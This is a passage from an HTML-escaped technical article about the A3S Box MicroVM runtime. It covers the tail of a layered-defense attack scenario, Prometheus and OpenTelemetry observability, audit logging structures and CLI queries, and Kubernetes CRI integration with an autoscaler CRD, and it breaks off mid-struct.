Step 3: Assume attacker exploits a kernel vulnerability
        -&amp;gt; Faces Layer 1 (Hardware virtualization): VM Exit mechanism blocks cross-VM access
        -&amp;gt; Cannot read MicroVM B's memory

Step 4: Assume attacker even breaks through the virtualization layer (extremely rare)
        -&amp;gt; Faces Layer 2 (TEE memory encryption): MicroVM B's memory is encrypted
        -&amp;gt; Even if raw memory data is read, it's only ciphertext

Conclusion: The attacker must simultaneously breach all seven layers to achieve the goal.
            Each layer is independent; breaching one layer does not reduce other layers' defense strength.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  17. Observability: Prometheus, OpenTelemetry, and Auditing
&lt;/h2&gt;

&lt;h3&gt;
  
  
  17.1 The Three Pillars of Observability
&lt;/h3&gt;

&lt;p&gt;Running a MicroVM cluster in production requires observability. A3S Box implements the three pillars of observability: Metrics, Tracing, and Auditing.&lt;/p&gt;

&lt;h3&gt;
  
  
  17.2 Prometheus Metrics
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;RuntimeMetrics&lt;/code&gt; implements the &lt;code&gt;MetricsCollector&lt;/code&gt; trait, exposing the following metrics via the Prometheus client library:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;VM lifecycle metrics:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric Name&lt;/th&gt;
&lt;th&gt;Type&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;vm_boot_duration&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Histogram&lt;/td&gt;
&lt;td&gt;VM startup duration distribution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;vm_created_total&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Counter&lt;/td&gt;
&lt;td&gt;Total VMs created&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;vm_destroyed_total&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Counter&lt;/td&gt;
&lt;td&gt;Total VMs destroyed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;vm_count&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Gauge&lt;/td&gt;
&lt;td&gt;Current number of running VMs&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Command execution metrics:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric Name&lt;/th&gt;
&lt;th&gt;Type&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;exec_total&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Counter&lt;/td&gt;
&lt;td&gt;Total commands executed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;exec_duration&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Histogram&lt;/td&gt;
&lt;td&gt;Command execution duration distribution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;exec_errors_total&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Counter&lt;/td&gt;
&lt;td&gt;Total execution errors&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;VM-level metrics:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Each VM also exposes real-time resource usage metrics:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;VmMetrics&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;cpu_percent&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;f32&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c1"&gt;// CPU usage&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;memory_bytes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="c1"&gt;// Memory usage&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;These metrics are collected from the host's &lt;code&gt;/proc&lt;/code&gt; filesystem via the &lt;code&gt;sysinfo&lt;/code&gt; library, reflecting the actual resource consumption of the shim subprocess (i.e., the VM).&lt;/p&gt;

&lt;h3&gt;
  
  
  17.3 OpenTelemetry Distributed Tracing
&lt;/h3&gt;

&lt;p&gt;A3S Box integrates the OpenTelemetry SDK to generate distributed tracing spans for key operations. This allows operators to trace the complete path of a request from CLI to runtime to shim to Guest Init.&lt;/p&gt;

&lt;p&gt;Typical trace chain:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[a3s-box run nginx]
  +-- [runtime.create_vm]
       +-- [oci.pull_image]
       |    +-- [registry.authenticate]
       |    +-- [registry.pull_manifest]
       |    +-- [registry.pull_layers]
       +-- [rootfs.build]
       +-- [vm.start]
       |    +-- [shim.spawn]
       |    +-- [shim.wait_ready]
       +-- [vm.configure_network]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Trace data can be exported to SigNoz, Jaeger, or any backend compatible with the OTLP protocol.&lt;/p&gt;

&lt;h3&gt;
  
  
  17.4 Audit Log System
&lt;/h3&gt;

&lt;p&gt;Audit logs are a critical component of security compliance. A3S Box's audit system is based on the W7 model (Who, What, When, Where, Why, How, Outcome), recording all security-related operations.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;AuditEvent&lt;/code&gt; structure:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;AuditEvent&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                          &lt;span class="c1"&gt;// Unique event ID&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;timestamp&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;DateTime&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;Utc&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;            &lt;span class="c1"&gt;// Timestamp&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;action&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;AuditAction&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                 &lt;span class="c1"&gt;// Operation type&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;box_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;              &lt;span class="c1"&gt;// Associated MicroVM ID&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;actor&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;               &lt;span class="c1"&gt;// Actor&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;outcome&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;AuditOutcome&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;               &lt;span class="c1"&gt;// Result&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;             &lt;span class="c1"&gt;// Description&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;metadata&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;HashMap&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="c1"&gt;// Additional metadata&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  17.5 Audit Operation Categories
&lt;/h3&gt;

&lt;p&gt;A3S Box defines 26 audit operations across seven categories:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Category&lt;/th&gt;
&lt;th&gt;Operations&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Box lifecycle&lt;/td&gt;
&lt;td&gt;Create, Start, Stop, Destroy, Restart&lt;/td&gt;
&lt;td&gt;VM creation, start, stop, destroy, restart&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Execution&lt;/td&gt;
&lt;td&gt;Command, Attach&lt;/td&gt;
&lt;td&gt;Command execution, terminal attach&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Image&lt;/td&gt;
&lt;td&gt;Pull, Push, Build, Delete&lt;/td&gt;
&lt;td&gt;Image pull, push, build, delete&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network&lt;/td&gt;
&lt;td&gt;Create, Delete, Connect, Disconnect&lt;/td&gt;
&lt;td&gt;Network create, delete, connect, disconnect&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Volume&lt;/td&gt;
&lt;td&gt;Create, Delete&lt;/td&gt;
&lt;td&gt;Volume create, delete&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Security&lt;/td&gt;
&lt;td&gt;SignatureVerify, AttestationVerify, SecretInject, SealData, UnsealData&lt;/td&gt;
&lt;td&gt;Signature verify, attestation verify, key inject, data seal/unseal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Auth&lt;/td&gt;
&lt;td&gt;RegistryLogin, Logout&lt;/td&gt;
&lt;td&gt;Registry login, logout&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;System&lt;/td&gt;
&lt;td&gt;Prune, ConfigChange&lt;/td&gt;
&lt;td&gt;Cleanup, config change&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Each audit event's result (&lt;code&gt;AuditOutcome&lt;/code&gt;) is one of three: &lt;code&gt;Success&lt;/code&gt;, &lt;code&gt;Failure&lt;/code&gt;, &lt;code&gt;Denied&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  17.6 Audit Log Configuration
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;AuditConfig&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;enabled&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;       &lt;span class="c1"&gt;// Default true&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;max_size&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;       &lt;span class="c1"&gt;// Maximum single file size, default 50 MB&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;max_files&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;u32&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;      &lt;span class="c1"&gt;// Maximum number of files, default 10&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Audit logs are written in JSON-lines format with log rotation support. When a single file reaches &lt;code&gt;max_size&lt;/code&gt;, it automatically rotates, retaining at most &lt;code&gt;max_files&lt;/code&gt; historical files. Total audit storage limit is &lt;code&gt;max_size x max_files&lt;/code&gt; (default 500 MB).&lt;/p&gt;

&lt;p&gt;Users can query audit logs via CLI:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# View all audit events&lt;/span&gt;
a3s-box audit

&lt;span class="c"&gt;# Filter by operation type&lt;/span&gt;
a3s-box audit &lt;span class="nt"&gt;--filter&lt;/span&gt; &lt;span class="s2"&gt;"action=exec"&lt;/span&gt;

&lt;span class="c"&gt;# Filter by MicroVM&lt;/span&gt;
a3s-box audit &lt;span class="nt"&gt;--filter&lt;/span&gt; &lt;span class="s2"&gt;"box_id=my-app"&lt;/span&gt;

&lt;span class="c"&gt;# Filter by time range&lt;/span&gt;
a3s-box audit &lt;span class="nt"&gt;--since&lt;/span&gt; &lt;span class="s2"&gt;"2024-01-01T00:00:00Z"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  17.7 Custom Audit Backend
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;AuditSink&lt;/code&gt; trait allows users to implement custom audit event persistence backends:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;trait&lt;/span&gt; &lt;span class="n"&gt;AuditSink&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Sync&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;AuditEvent&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;flush&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The default implementation writes events to JSON-lines files. Users can implement their own &lt;code&gt;AuditSink&lt;/code&gt; to send events to Elasticsearch, Splunk, CloudWatch Logs, or any other log aggregation system.&lt;/p&gt;




&lt;h2&gt;
  
  
  18. Kubernetes Integration: CRI Runtime
&lt;/h2&gt;

&lt;h3&gt;
  
  
  18.1 The Role of CRI
&lt;/h3&gt;

&lt;p&gt;CRI (Container Runtime Interface) is the standard interface defined by Kubernetes for communication between kubelet and container runtimes. By implementing CRI, A3S Box can run as a Kubernetes RuntimeClass — meaning Pods in a Kubernetes cluster can choose to run in A3S Box's MicroVMs rather than traditional runc containers.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubelet
  |
  +-- RuntimeClass: runc (default)
  |   +-- Traditional containers (shared kernel)
  |
  +-- RuntimeClass: a3s-box
      +-- MicroVM (independent kernel + optional TEE)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  18.2 BoxAutoscaler CRD
&lt;/h3&gt;

&lt;p&gt;A3S Box defines a custom resource &lt;code&gt;BoxAutoscaler&lt;/code&gt; (API Group: &lt;code&gt;box.a3s.dev&lt;/code&gt;, version: &lt;code&gt;v1alpha1&lt;/code&gt;) for implementing MicroVM auto-scaling in Kubernetes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;box.a3s.dev/v1alpha1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;BoxAutoscaler&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-service-autoscaler&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;targetRef&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;box.a3s.dev/v1alpha1&lt;/span&gt;
    &lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;BoxDeployment&lt;/span&gt;
    &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-service&lt;/span&gt;
  &lt;span class="na"&gt;minReplicas&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;
  &lt;span class="na"&gt;maxReplicas&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;10&lt;/span&gt;
  &lt;span class="na"&gt;metrics&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Cpu&lt;/span&gt;
      &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;70&lt;/span&gt;          &lt;span class="c1"&gt;# CPU usage target 70%&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Memory&lt;/span&gt;
      &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;          &lt;span class="c1"&gt;# Memory usage target 80%&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Rps&lt;/span&gt;
      &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1000&lt;/span&gt;        &lt;span class="c1"&gt;# Requests per second target&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Inflight&lt;/span&gt;
      &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;50&lt;/span&gt;          &lt;span class="c1"&gt;# Concurrent requests target&lt;/span&gt;
  &lt;span class="na"&gt;behavior&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;scaleUp&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;stabilizationWindowSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;60&lt;/span&gt;
      &lt;span class="na"&gt;policies&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pods&lt;/span&gt;
          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3&lt;/span&gt;
          &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;60&lt;/span&gt;    &lt;span class="c1"&gt;# Scale up at most 3 per minute&lt;/span&gt;
    &lt;span class="na"&gt;scaleDown&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;stabilizationWindowSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;300&lt;/span&gt;
      &lt;span class="na"&gt;policies&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pods&lt;/span&gt;
          &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;
          &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;60&lt;/span&gt;    &lt;span class="c1"&gt;# Scale down at most 1 per minute&lt;/span&gt;
  &lt;span class="na"&gt;cooldownSecs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;60&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  18.3 Metric Types
&lt;/h3&gt;

&lt;p&gt;BoxAutoscaler supports five metric types:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric Type&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Typical Target&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Cpu&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;CPU usage percentage&lt;/td&gt;
&lt;td&gt;70%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Memory&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Memory usage percentage&lt;/td&gt;
&lt;td&gt;80%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Inflight&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Current concurrent requests&lt;/td&gt;
&lt;td&gt;50&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Rps&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Requests per second&lt;/td&gt;
&lt;td&gt;1000&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Custom&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Custom metrics (Prometheus query)&lt;/td&gt;
&lt;td&gt;Scenario-dependent&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  18.4 Instance Lifecycle
&lt;/h3&gt;

&lt;p&gt;In Kubernetes integration, each MicroVM instance goes through the following state transitions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Creating -&amp;gt; Booting -&amp;gt; Ready -&amp;gt; Busy -&amp;gt; Draining -&amp;gt; Stopping -&amp;gt; Stopped
                        ^       |
                        +-------+
                                         v (abnormal)
                                       Failed
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;State meanings:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Creating&lt;/strong&gt;: Instance configuration generated, resources being allocated&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Booting&lt;/strong&gt;: MicroVM starting (kernel boot, Guest Init initialization)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ready&lt;/strong&gt;: Instance ready, can receive traffic&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Busy&lt;/strong&gt;: Instance processing a request&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Draining&lt;/strong&gt;: Instance draining existing requests (graceful transition before scale-down)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stopping&lt;/strong&gt;: Instance shutting down&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stopped&lt;/strong&gt;: Instance stopped&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Failed&lt;/strong&gt;: Instance terminated abnormally&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  18.5 Scale API
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;ScaleRequest&lt;/code&gt; and &lt;code&gt;ScaleResponse&lt;/code&gt; define the request/response protocol for scaling:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ScaleRequest&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
